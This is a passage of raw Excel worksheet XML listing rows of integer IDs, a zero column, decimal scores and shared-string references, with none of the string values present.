        <v>4760</v>
      </c>
      <c r="C329">
        <v>4760</v>
      </c>
      <c r="D329">
        <v>0</v>
      </c>
      <c r="E329">
        <v>0.99720001220703125</v>
      </c>
      <c r="F329" t="s">
        <v>7</v>
      </c>
      <c r="G329" t="s">
        <v>656</v>
      </c>
      <c r="H329" t="s">
        <v>657</v>
      </c>
    </row>
    <row r="330" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A330" s="1">
        <v>328</v>
      </c>
      <c r="B330">
        <v>4757</v>
      </c>
      <c r="C330">
        <v>4757</v>
      </c>
      <c r="D330">
        <v>0</v>
      </c>
      <c r="E330">
        <v>0.6711999773979187</v>
      </c>
      <c r="F330" t="s">
        <v>7</v>
      </c>
      <c r="G330" t="s">
        <v>658</v>
      </c>
      <c r="H330" t="s">
        <v>659</v>
      </c>
    </row>
    <row r="331" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A331" s="1">
        <v>329</v>
      </c>
      <c r="B331">
        <v>7245</v>
      </c>
      <c r="C331">
        <v>7245</v>
      </c>
      <c r="D331">
        <v>0</v>
      </c>
      <c r="E331">
        <v>0.99709999561309814</v>
      </c>
      <c r="F331" t="s">
        <v>7</v>
      </c>
      <c r="G331" t="s">
        <v>660</v>
      </c>
      <c r="H331" t="s">
        <v>661</v>
      </c>
    </row>
    <row r="332" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A332" s="1">
        <v>330</v>
      </c>
      <c r="B332">
        <v>1504</v>
      </c>
      <c r="C332">
        <v>1504</v>
      </c>
      <c r="D332">
        <v>0</v>
      </c>
      <c r="E332">
        <v>0.66299998760223389</v>
      </c>
      <c r="F332" t="s">
        <v>7</v>
      </c>
      <c r="G332" t="s">
        <v>662</v>
      </c>
      <c r="H332" t="s">
        <v>663</v>
      </c>
    </row>
    <row r="333" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A333" s="1">
        <v>331</v>
      </c>
      <c r="B333">
        <v>7251</v>
      </c>
      <c r="C333">
        <v>7251</v>
      </c>
      <c r="D333">
        <v>0</v>
      </c>
      <c r="E333">
        <v>0.93080002069473267</v>
      </c>
      <c r="F333" t="s">
        <v>7</v>
      </c>
      <c r="G333" t="s">
        <v>664</v>
      </c>
      <c r="H333" t="s">
        <v>665</v>
      </c>
    </row>
    <row r="334" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A334" s="1">
        <v>332</v>
      </c>
      <c r="B334">
        <v>4754</v>
      </c>
      <c r="C334">
        <v>4754</v>
      </c>
      <c r="D334">
        <v>0</v>
      </c>
      <c r="E334">
        <v>0.45530000329017639</v>
      </c>
      <c r="F334" t="s">
        <v>7</v>
      </c>
      <c r="G334" t="s">
        <v>666</v>
      </c>
      <c r="H334" t="s">
        <v>667</v>
      </c>
    </row>
    <row r="335" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A335" s="1">
        <v>333</v>
      </c>
      <c r="B335">
        <v>4753</v>
      </c>
      <c r="C335">
        <v>4753</v>
      </c>
      <c r="D335">
        <v>0</v>
      </c>
      <c r="E335">
        <v>0.90700000524520874</v>
      </c>
      <c r="F335" t="s">
        <v>7</v>
      </c>
      <c r="G335" t="s">
        <v>668</v>
      </c>
      <c r="H335" t="s">
        <v>669</v>
      </c>
    </row>
    <row r="336" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A336" s="1">
        <v>334</v>
      </c>
      <c r="B336">
        <v>5905</v>
      </c>
      <c r="C336">
        <v>5905</v>
      </c>
      <c r="D336">
        <v>0</v>
      </c>
      <c r="E336">
        <v>0.99709999561309814</v>
      </c>
      <c r="F336" t="s">
        <v>7</v>
      </c>
      <c r="G336" t="s">
        <v>670</v>
      </c>
      <c r="H336" t="s">
        <v>671</v>
      </c>
    </row>
    <row r="337" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A337" s="1">
        <v>335</v>
      </c>
      <c r="B337">
        <v>4751</v>
      </c>
      <c r="C337">
        <v>4751</v>
      </c>
      <c r="D337">
        <v>0</v>
      </c>
      <c r="E337">
        <v>0.50379997491836548</v>
      </c>
      <c r="F337" t="s">
        <v>7</v>
      </c>
      <c r="G337" t="s">
        <v>672</v>
      </c>
      <c r="H337" t="s">
        <v>673</v>
      </c>
    </row>
    <row r="338" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A338" s="1">
        <v>336</v>
      </c>
      <c r="B338">
        <v>1512</v>
      </c>
      <c r="C338">
        <v>1512</v>
      </c>
      <c r="D338">
        <v>0</v>
      </c>
      <c r="E338">
        <v>0.93110001087188721</v>
      </c>
      <c r="F338" t="s">
        <v>7</v>
      </c>
      <c r="G338" t="s">
        <v>674</v>
      </c>
      <c r="H338" t="s">
        <v>675</v>
      </c>
    </row>
    <row r="339" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A339" s="1">
        <v>337</v>
      </c>
      <c r="B339">
        <v>1513</v>
      </c>
      <c r="C339">
        <v>1513</v>
      </c>
      <c r="D339">
        <v>0</v>
      </c>
      <c r="E339">
        <v>0.94260001182556152</v>
      </c>
      <c r="F339" t="s">
        <v>7</v>
      </c>
      <c r="G339" t="s">
        <v>676</v>
      </c>
      <c r="H339" t="s">
        <v>677</v>
      </c>
    </row>
    <row r="340" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A340" s="1">
        <v>338</v>
      </c>
      <c r="B340">
        <v>4750</v>
      </c>
      <c r="C340">
        <v>4750</v>
      </c>
      <c r="D340">
        <v>0</v>
      </c>
      <c r="E340">
        <v>0.70929998159408569</v>
      </c>
      <c r="F340" t="s">
        <v>7</v>
      </c>
      <c r="G340" t="s">
        <v>678</v>
      </c>
      <c r="H340" t="s">
        <v>679</v>
      </c>
    </row>
    <row r="341" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A341" s="1">
        <v>339</v>
      </c>
      <c r="B341">
        <v>4749</v>
      </c>
      <c r="C341">
        <v>4749</v>
      </c>
      <c r="D341">
        <v>0</v>
      </c>
      <c r="E341">
        <v>0.99250000715255737</v>
      </c>
      <c r="F341" t="s">
        <v>7</v>
      </c>
      <c r="G341" t="s">
        <v>680</v>
      </c>
      <c r="H341" t="s">
        <v>681</v>
      </c>
    </row>
    <row r="342" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A342" s="1">
        <v>340</v>
      </c>
      <c r="B342">
        <v>1507</v>
      </c>
      <c r="C342">
        <v>1507</v>
      </c>
      <c r="D342">
        <v>0</v>
      </c>
      <c r="E342">
        <v>0.99720001220703125</v>
      </c>
      <c r="F342" t="s">
        <v>7</v>
      </c>
      <c r="G342" t="s">
        <v>682</v>
      </c>
      <c r="H342" t="s">
        <v>683</v>
      </c>
    </row>
    <row r="343" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A343" s="1">
        <v>341</v>
      </c>
      <c r="B343">
        <v>1522</v>
      </c>
      <c r="C343">
        <v>1522</v>
      </c>
      <c r="D343">
        <v>0</v>
      </c>
      <c r="E343">
        <v>0.5526999831199646</v>
      </c>
      <c r="F343" t="s">
        <v>7</v>
      </c>
      <c r="G343" t="s">
        <v>684</v>
      </c>
      <c r="H343" t="s">
        <v>685</v>
      </c>
    </row>
    <row r="344" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A344" s="1">
        <v>342</v>
      </c>
      <c r="B344">
        <v>1485</v>
      </c>
      <c r="C344">
        <v>1485</v>
      </c>
      <c r="D344">
        <v>0</v>
      </c>
      <c r="E344">
        <v>0.61040002107620239</v>
      </c>
      <c r="F344" t="s">
        <v>7</v>
      </c>
      <c r="G344" t="s">
        <v>686</v>
      </c>
      <c r="H344" t="s">
        <v>687</v>
      </c>
    </row>
    <row r="345" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A345" s="1">
        <v>343</v>
      </c>
      <c r="B345">
        <v>1479</v>
      </c>
      <c r="C345">
        <v>1479</v>
      </c>
      <c r="D345">
        <v>0</v>
      </c>
      <c r="E345">
        <v>0.79360002279281616</v>
      </c>
      <c r="F345" t="s">
        <v>7</v>
      </c>
      <c r="G345" t="s">
        <v>688</v>
      </c>
      <c r="H345" t="s">
        <v>689</v>
      </c>
    </row>
    <row r="346" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A346" s="1">
        <v>344</v>
      </c>
      <c r="B346">
        <v>1439</v>
      </c>
      <c r="C346">
        <v>1439</v>
      </c>
      <c r="D346">
        <v>0</v>
      </c>
      <c r="E346">
        <v>0.99330002069473267</v>
      </c>
      <c r="F346" t="s">
        <v>7</v>
      </c>
      <c r="G346" t="s">
        <v>690</v>
      </c>
      <c r="H346" t="s">
        <v>691</v>
      </c>
    </row>
    <row r="347" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A347" s="1">
        <v>345</v>
      </c>
      <c r="B347">
        <v>1440</v>
      </c>
      <c r="C347">
        <v>1440</v>
      </c>
      <c r="D347">
        <v>0</v>
      </c>
      <c r="E347">
        <v>0.73549997806549072</v>
      </c>
      <c r="F347" t="s">
        <v>7</v>
      </c>
      <c r="G347" t="s">
        <v>692</v>
      </c>
      <c r="H347" t="s">
        <v>693</v>
      </c>
    </row>
    <row r="348" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A348" s="1">
        <v>346</v>
      </c>
      <c r="B348">
        <v>4782</v>
      </c>
      <c r="C348">
        <v>4782</v>
      </c>
      <c r="D348">
        <v>0</v>
      </c>
      <c r="E348">
        <v>0.70359998941421509</v>
      </c>
      <c r="F348" t="s">
        <v>7</v>
      </c>
      <c r="G348" t="s">
        <v>694</v>
      </c>
      <c r="H348" t="s">
        <v>695</v>
      </c>
    </row>
    <row r="349" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A349" s="1">
        <v>347</v>
      </c>
      <c r="B349">
        <v>1451</v>
      </c>
      <c r="C349">
        <v>1451</v>
      </c>
      <c r="D349">
        <v>0</v>
      </c>
      <c r="E349">
        <v>0.57800000905990601</v>
      </c>
      <c r="F349" t="s">
        <v>7</v>
      </c>
      <c r="G349" t="s">
        <v>696</v>
      </c>
      <c r="H349" t="s">
        <v>697</v>
      </c>
    </row>
    <row r="350" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A350" s="1">
        <v>348</v>
      </c>
      <c r="B350">
        <v>1455</v>
      </c>
      <c r="C350">
        <v>1455</v>
      </c>
      <c r="D350">
        <v>0</v>
      </c>
      <c r="E350">
        <v>0.7224000096321106</v>
      </c>
      <c r="F350" t="s">
        <v>7</v>
      </c>
      <c r="G350" t="s">
        <v>698</v>
      </c>
      <c r="H350" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="351" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A351" s="1">
        <v>349</v>
      </c>
      <c r="B351">
        <v>1457</v>
      </c>
      <c r="C351">
        <v>1457</v>
      </c>
      <c r="D351">
        <v>0</v>
      </c>
      <c r="E351">
        <v>0.45570001006126398</v>
      </c>
      <c r="F351" t="s">
        <v>7</v>
      </c>
      <c r="G351" t="s">
        <v>700</v>
      </c>
      <c r="H351" t="s">
        <v>701</v>
      </c>
    </row>
    <row r="352" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A352" s="1">
        <v>350</v>
      </c>
      <c r="B352">
        <v>4773</v>
      </c>
      <c r="C352">
        <v>4773</v>
      </c>
      <c r="D352">
        <v>0</v>
      </c>
      <c r="E352">
        <v>0.85769999027252197</v>
      </c>
      <c r="F352" t="s">
        <v>7</v>
      </c>
      <c r="G352" t="s">
        <v>702</v>
      </c>
      <c r="H352" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="353" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A353" s="1">
        <v>351</v>
      </c>
      <c r="B353">
        <v>1484</v>
      </c>
      <c r="C353">
        <v>1484</v>
      </c>
      <c r="D353">
        <v>0</v>
      </c>
      <c r="E353">
        <v>0.5756000280380249</v>
      </c>
      <c r="F353" t="s">
        <v>7</v>
      </c>
      <c r="G353" t="s">
        <v>704</v>
      </c>
      <c r="H353" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="354" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A354" s="1">
        <v>352</v>
      </c>
      <c r="B354">
        <v>1463</v>
      </c>
      <c r="C354">
        <v>1463</v>
      </c>
      <c r="D354">
        <v>0</v>
      </c>
      <c r="E354">
        <v>0.64069998264312744</v>
      </c>
      <c r="F354" t="s">
        <v>7</v>
      </c>
      <c r="G354" t="s">
        <v>706</v>
      </c>
      <c r="H354" t="s">
        <v>707</v>
      </c>
    </row>
    <row r="355" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A355" s="1">
        <v>353</v>
      </c>
      <c r="B355">
        <v>1468</v>
      </c>
      <c r="C355">
        <v>1468</v>
      </c>
      <c r="D355">
        <v>0</v>
      </c>
      <c r="E355">
        <v>0.58649998903274536</v>
      </c>
      <c r="F355" t="s">
        <v>7</v>
      </c>
      <c r="G355" t="s">
        <v>708</v>
      </c>
      <c r="H355" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="356" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A356" s="1">
        <v>354</v>
      </c>
      <c r="B356">
        <v>1470</v>
      </c>
      <c r="C356">
        <v>1470</v>
      </c>
      <c r="D356">
        <v>0</v>
      </c>
      <c r="E356">
        <v>0.99860000610351563</v>
      </c>
      <c r="F356" t="s">
        <v>7</v>
      </c>
      <c r="G356" t="s">
        <v>710</v>
      </c>
      <c r="H356" t="s">
        <v>711</v>
      </c>
    </row>
    <row r="357" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A357" s="1">
        <v>355</v>
      </c>
      <c r="B357">
        <v>1472</v>
      </c>
      <c r="C357">
        <v>1472</v>
      </c>
      <c r="D357">
        <v>0</v>
      </c>
      <c r="E357">
        <v>0.99220001697540283</v>
      </c>
      <c r="F357" t="s">
        <v>7</v>
      </c>
      <c r="G357" t="s">
        <v>712</v>
      </c>
      <c r="H357" t="s">
        <v>713</v>
      </c>
    </row>
    <row r="358" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A358" s="1">
        <v>356</v>
      </c>
      <c r="B358">
        <v>1473</v>
      </c>
      <c r="C358">
        <v>1473</v>
      </c>
      <c r="D358">
        <v>0</v>
      </c>
      <c r="E358">
        <v>0.64079999923706055</v>
      </c>
      <c r="F358" t="s">
        <v>7</v>
      </c>
      <c r="G358" t="s">
        <v>714</v>
      </c>
      <c r="H358" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="359" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A359" s="1">
        <v>357</v>
      </c>
      <c r="B359">
        <v>4768</v>
      </c>
      <c r="C359">
        <v>4768</v>
      </c>
      <c r="D359">
        <v>0</v>
      </c>
      <c r="E359">
        <v>0.73489999771118164</v>
      </c>
      <c r="F359" t="s">
        <v>7</v>
      </c>
      <c r="G359" t="s">
        <v>716</v>
      </c>
      <c r="H359" t="s">
        <v>717</v>
      </c>
    </row>
    <row r="360" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A360" s="1">
        <v>358</v>
      </c>
      <c r="B360">
        <v>1476</v>
      </c>
      <c r="C360">
        <v>1476</v>
      </c>
      <c r="D360">
        <v>0</v>
      </c>
      <c r="E360">
        <v>0.57239997386932373</v>
      </c>
      <c r="F360" t="s">
        <v>7</v>
      </c>
      <c r="G360" t="s">
        <v>718</v>
      </c>
      <c r="H360" t="s">
        <v>719</v>
      </c>
    </row>
    <row r="361" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A361" s="1">
        <v>359</v>
      </c>
      <c r="B361">
        <v>7255</v>
      </c>
      <c r="C361">
        <v>7255</v>
      </c>
      <c r="D361">
        <v>0</v>
      </c>
      <c r="E361">
        <v>0.68000000715255737</v>
      </c>
      <c r="F361" t="s">
        <v>7</v>
      </c>
      <c r="G361" t="s">
        <v>720</v>
      </c>
      <c r="H361" t="s">
        <v>721</v>
      </c>
    </row>
    <row r="362" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A362" s="1">
        <v>360</v>
      </c>
      <c r="B362">
        <v>4772</v>
      </c>
      <c r="C362">
        <v>4772</v>
      </c>
      <c r="D362">
        <v>0</v>
      </c>
      <c r="E362">
        <v>0.76399999856948853</v>
      </c>
      <c r="F362" t="s">
        <v>7</v>
      </c>
      <c r="G362" t="s">
        <v>722</v>
      </c>
      <c r="H362" t="s">
        <v>723</v>
      </c>
    </row>
    <row r="363" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A363" s="1">
        <v>361</v>
      </c>
      <c r="B363">
        <v>4747</v>
      </c>
      <c r="C363">
        <v>4747</v>
      </c>
      <c r="D363">
        <v>0</v>
      </c>
      <c r="E363">
        <v>0.79589998722076416</v>
      </c>
      <c r="F363" t="s">
        <v>7</v>
      </c>
      <c r="G363" t="s">
        <v>724</v>
      </c>
      <c r="H363" t="s">
        <v>725</v>
      </c>
    </row>
    <row r="364" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A364" s="1">
        <v>362</v>
      </c>
      <c r="B364">
        <v>7237</v>
      </c>
      <c r="C364">
        <v>7237</v>
      </c>
      <c r="D364">
        <v>0</v>
      </c>
      <c r="E364">
        <v>0.71640002727508545</v>
      </c>
      <c r="F364" t="s">
        <v>7</v>
      </c>
      <c r="G364" t="s">
        <v>726</v>
      </c>
      <c r="H364" t="s">
        <v>727</v>
      </c>
    </row>
    <row r="365" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A365" s="1">
        <v>363</v>
      </c>
      <c r="B365">
        <v>1526</v>
      </c>
      <c r="C365">
        <v>1526</v>
      </c>
      <c r="D365">
        <v>0</v>
      </c>
      <c r="E365">
        <v>0.42109999060630798</v>
      </c>
      <c r="F365" t="s">
        <v>7</v>
      </c>
      <c r="G365" t="s">
        <v>728</v>
      </c>
      <c r="H365" t="s">
        <v>729</v>
      </c>
    </row>
    <row r="366" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A366" s="1">
        <v>364</v>
      </c>
      <c r="B366">
        <v>1558</v>
      </c>
      <c r="C366">
        <v>1558</v>
      </c>
      <c r="D366">
        <v>0</v>
      </c>
      <c r="E366">
        <v>0.48519998788833618</v>
      </c>
      <c r="F366" t="s">
        <v>7</v>
      </c>
      <c r="G366" t="s">
        <v>730</v>
      </c>
      <c r="H366" t="s">
        <v>731</v>
      </c>
    </row>
    <row r="367" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A367" s="1">
        <v>365</v>
      </c>
      <c r="B367">
        <v>1559</v>
      </c>
      <c r="C367">
        <v>1559</v>
      </c>
      <c r="D367">
        <v>0</v>
      </c>
      <c r="E367">
        <v>0.892799973487854</v>
      </c>
      <c r="F367" t="s">
        <v>7</v>
      </c>
      <c r="G367" t="s">
        <v>732</v>
      </c>
      <c r="H367" t="s">
        <v>733</v>
      </c>
    </row>
    <row r="368" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A368" s="1">
        <v>366</v>
      </c>
      <c r="B368">
        <v>7222</v>
      </c>
      <c r="C368">
        <v>7222</v>
      </c>
      <c r="D368">
        <v>0</v>
      </c>
      <c r="E368">
        <v>0.99620002508163452</v>
      </c>
      <c r="F368" t="s">
        <v>7</v>
      </c>
      <c r="G368" t="s">
        <v>734</v>
      </c>
      <c r="H368" t="s">
        <v>735</v>
      </c>
    </row>
    <row r="369" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A369" s="1">
        <v>367</v>
      </c>
      <c r="B369">
        <v>1562</v>
      </c>
      <c r="C369">
        <v>1562</v>
      </c>
      <c r="D369">
        <v>0</v>
      </c>
      <c r="E369">
        <v>0.78250002861022949</v>
      </c>
      <c r="F369" t="s">
        <v>7</v>
      </c>
      <c r="G369" t="s">
        <v>736</v>
      </c>
      <c r="H369" t="s">
        <v>737</v>
      </c>
    </row>
    <row r="370" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A370" s="1">
        <v>368</v>
      </c>
      <c r="B370">
        <v>1563</v>
      </c>
      <c r="C370">
        <v>1563</v>
      </c>
      <c r="D370">
        <v>0</v>
      </c>
      <c r="E370">
        <v>0.60879999399185181</v>
      </c>
      <c r="F370" t="s">
        <v>7</v>
      </c>
      <c r="G370" t="s">
        <v>738</v>
      </c>
      <c r="H370" t="s">
        <v>739</v>
      </c>
    </row>
    <row r="371" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A371" s="1">
        <v>369</v>
      </c>
      <c r="B371">
        <v>1565</v>
      </c>
      <c r="C371">
        <v>1565</v>
      </c>
      <c r="D371">
        <v>0</v>
      </c>
      <c r="E371">
        <v>0.99980002641677856</v>
      </c>
      <c r="F371" t="s">
        <v>7</v>
      </c>
      <c r="G371" t="s">
        <v>740</v>
      </c>
      <c r="H371" t="s">
        <v>741</v>
      </c>
    </row>
    <row r="372" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A372" s="1">
        <v>370</v>
      </c>
      <c r="B372">
        <v>1566</v>
      </c>
      <c r="C372">
        <v>1566</v>
      </c>
      <c r="D372">
        <v>0</v>
      </c>
      <c r="E372">
        <v>0.97630000114440918</v>
      </c>
      <c r="F372" t="s">
        <v>7</v>
      </c>
      <c r="G372" t="s">
        <v>742</v>
      </c>
      <c r="H372" t="s">
        <v>743</v>
      </c>
    </row>
    <row r="373" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A373" s="1">
        <v>371</v>
      </c>
      <c r="B373">
        <v>4729</v>
      </c>
      <c r="C373">
        <v>4729</v>
      </c>
      <c r="D373">
        <v>0</v>
      </c>
      <c r="E373">
        <v>0.99800002574920654</v>
      </c>
      <c r="F373" t="s">
        <v>7</v>
      </c>
      <c r="G373" t="s">
        <v>744</v>
      </c>
      <c r="H373" t="s">
        <v>745</v>
      </c>
    </row>
    <row r="374" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A374" s="1">
        <v>372</v>
      </c>
      <c r="B374">
        <v>4727</v>
      </c>
      <c r="C374">
        <v>4727</v>
      </c>
      <c r="D374">
        <v>0</v>
      </c>
      <c r="E374">
        <v>0.98309999704360962</v>
      </c>
      <c r="F374" t="s">
        <v>7</v>
      </c>
      <c r="G374" t="s">
        <v>746</v>
      </c>
      <c r="H374" t="s">
        <v>747</v>
      </c>
    </row>
    <row r="375" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A375" s="1">
        <v>373</v>
      </c>
      <c r="B375">
        <v>7221</v>
      </c>
      <c r="C375">
        <v>7221</v>
      </c>
      <c r="D375">
        <v>0</v>
      </c>
      <c r="E375">
        <v>0.9976000189781189</v>
      </c>
      <c r="F375" t="s">
        <v>7</v>
      </c>
      <c r="G375" t="s">
        <v>748</v>
      </c>
      <c r="H375" t="s">
        <v>403</v>
      </c>
    </row>
    <row r="376" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A376" s="1">
        <v>374</v>
      </c>
      <c r="B376">
        <v>1571</v>
      </c>
      <c r="C376">
        <v>1571</v>
      </c>
      <c r="D376">
        <v>0</v>
      </c>
      <c r="E376">
        <v>0.64829999208450317</v>
      </c>
      <c r="F376" t="s">
        <v>7</v>
      </c>
      <c r="G376" t="s">
        <v>749</v>
      </c>
      <c r="H376" t="s">
        <v>750</v>
      </c>
    </row>
    <row r="377" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A377" s="1">
        <v>375</v>
      </c>
      <c r="B377">
        <v>4726</v>
      </c>
      <c r="C377">
        <v>4726</v>
      </c>
      <c r="D377">
        <v>0</v>
      </c>
      <c r="E377">
        <v>0.99639999866485596</v>
      </c>
      <c r="F377" t="s">
        <v>7</v>
      </c>
      <c r="G377" t="s">
        <v>751</v>
      </c>
      <c r="H377" t="s">
        <v>752</v>
      </c>
    </row>
    <row r="378" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A378" s="1">
        <v>376</v>
      </c>
      <c r="B378">
        <v>1573</v>
      </c>
      <c r="C378">
        <v>1573</v>
      </c>
      <c r="D378">
        <v>0</v>
      </c>
      <c r="E378">
        <v>0.99959999322891235</v>
      </c>
      <c r="F378" t="s">
        <v>7</v>
      </c>
      <c r="G378" t="s">
        <v>753</v>
      </c>
      <c r="H378" t="s">
        <v>754</v>
      </c>
    </row>
    <row r="379" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A379" s="1">
        <v>377</v>
      </c>
      <c r="B379">
        <v>1574</v>
      </c>
      <c r="C379">
        <v>1574</v>
      </c>
      <c r="D379">
        <v>0</v>
      </c>
      <c r="E379">
        <v>0.99419999122619629</v>
      </c>
      <c r="F379" t="s">
        <v>7</v>
      </c>
      <c r="G379" t="s">
        <v>755</v>
      </c>
      <c r="H379" t="s">
        <v>756</v>
      </c>
    </row>
    <row r="380" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A380" s="1">
        <v>378</v>
      </c>
      <c r="B380">
        <v>1576</v>
      </c>
      <c r="C380">
        <v>1576</v>
      </c>
      <c r="D380">
        <v>0</v>
      </c>
      <c r="E380">
        <v>0.94169998168945313</v>
      </c>
      <c r="F380" t="s">
        <v>7</v>
      </c>
      <c r="G380" t="s">
        <v>757</v>
      </c>
      <c r="H380" t="s">
        <v>758</v>
      </c>
    </row>
    <row r="381" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A381" s="1">
        <v>379</v>
      </c>
      <c r="B381">
        <v>4725</v>
      </c>
      <c r="C381">
        <v>4725</v>
      </c>
      <c r="D381">
        <v>0</v>
      </c>
      <c r="E381">
        <v>0.99119997024536133</v>
      </c>
      <c r="F381" t="s">
        <v>7</v>
      </c>
      <c r="G381" t="s">
        <v>759</v>
      </c>
      <c r="H381" t="s">
        <v>760</v>
      </c>
    </row>
    <row r="382" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A382" s="1">
        <v>380</v>
      </c>
      <c r="B382">
        <v>1569</v>
      </c>
      <c r="C382">
        <v>1569</v>
      </c>
      <c r="D382">
        <v>0</v>
      </c>
      <c r="E382">
        <v>0.67690002918243408</v>
      </c>
      <c r="F382" t="s">
        <v>7</v>
      </c>
      <c r="G382" t="s">
        <v>761</v>
      </c>
      <c r="H382" t="s">
        <v>762</v>
      </c>
    </row>
    <row r="383" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A383" s="1">
        <v>381</v>
      </c>
      <c r="B383">
        <v>4730</v>
      </c>
      <c r="C383">
        <v>4730</v>
      </c>
      <c r="D383">
        <v>0</v>
      </c>
      <c r="E383">
        <v>0.98559999465942383</v>
      </c>
      <c r="F383" t="s">
        <v>7</v>
      </c>
      <c r="G383" t="s">
        <v>763</v>
      </c>
      <c r="H383" t="s">
        <v>764</v>
      </c>
    </row>
    <row r="384" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A384" s="1">
        <v>382</v>
      </c>
      <c r="B384">
        <v>1553</v>
      </c>
      <c r="C384">
        <v>1553</v>
      </c>
      <c r="D384">
        <v>0</v>
      </c>
      <c r="E384">
        <v>0.63419997692108154</v>
      </c>
      <c r="F384" t="s">
        <v>7</v>
      </c>
      <c r="G384" t="s">
        <v>765</v>
      </c>
      <c r="H384" t="s">
        <v>766</v>
      </c>
    </row>
    <row r="385" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A385" s="1">
        <v>383</v>
      </c>
      <c r="B385">
        <v>4733</v>
      </c>
      <c r="C385">
        <v>4733</v>
      </c>
      <c r="D385">
        <v>0</v>
      </c>
      <c r="E385">
        <v>0.99849998950958252</v>
      </c>
      <c r="F385" t="s">
        <v>7</v>
      </c>
      <c r="G385" t="s">
        <v>767</v>
      </c>
      <c r="H385" t="s">
        <v>768</v>
      </c>
    </row>
    <row r="386" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A386" s="1">
        <v>384</v>
      </c>
      <c r="B386">
        <v>7236</v>
      </c>
      <c r="C386">
        <v>7236</v>
      </c>
      <c r="D386">
        <v>0</v>
      </c>
      <c r="E386">
        <v>0.78680002689361572</v>
      </c>
      <c r="F386" t="s">
        <v>7</v>
      </c>
      <c r="G386" t="s">
        <v>769</v>
      </c>
      <c r="H386" t="s">
        <v>770</v>
      </c>
    </row>
    <row r="387" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A387" s="1">
        <v>385</v>
      </c>
      <c r="B387">
        <v>4745</v>
      </c>
      <c r="C387">
        <v>4745</v>
      </c>
      <c r="D387">
        <v>0</v>
      </c>
      <c r="E387">
        <v>0.49799999594688421</v>
      </c>
      <c r="F387" t="s">
        <v>7</v>
      </c>
      <c r="G387" t="s">
        <v>771</v>
      </c>
      <c r="H387" t="s">
        <v>772</v>
      </c>
    </row>
    <row r="388" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A388" s="1">
        <v>386</v>
      </c>
      <c r="B388">
        <v>4744</v>
      </c>
      <c r="C388">
        <v>4744</v>
      </c>
      <c r="D388">
        <v>0</v>
      </c>
      <c r="E388">
        <v>0.52829998731613159</v>
      </c>
      <c r="F388" t="s">
        <v>7</v>
      </c>
      <c r="G388" t="s">
        <v>773</v>
      </c>
      <c r="H388" t="s">
        <v>774</v>
      </c>
    </row>
    <row r="389" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A389" s="1">
        <v>387</v>
      </c>
      <c r="B389">
        <v>1531</v>
      </c>
      <c r="C389">
        <v>1531</v>
      </c>
      <c r="D389">
        <v>0</v>
      </c>
      <c r="E389">
        <v>0.94349998235702515</v>
      </c>
      <c r="F389" t="s">
        <v>7</v>
      </c>
      <c r="G389" t="s">
        <v>775</v>
      </c>
      <c r="H389" t="s">
        <v>776</v>
      </c>
    </row>
    <row r="390" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A390" s="1">
        <v>388</v>
      </c>
      <c r="B390">
        <v>7235</v>
      </c>
      <c r="C390">
        <v>7235</v>
      </c>
      <c r="D390">
        <v>0</v>
      </c>
      <c r="E390">
        <v>0.9934999942779541</v>
      </c>
      <c r="F390" t="s">
        <v>7</v>
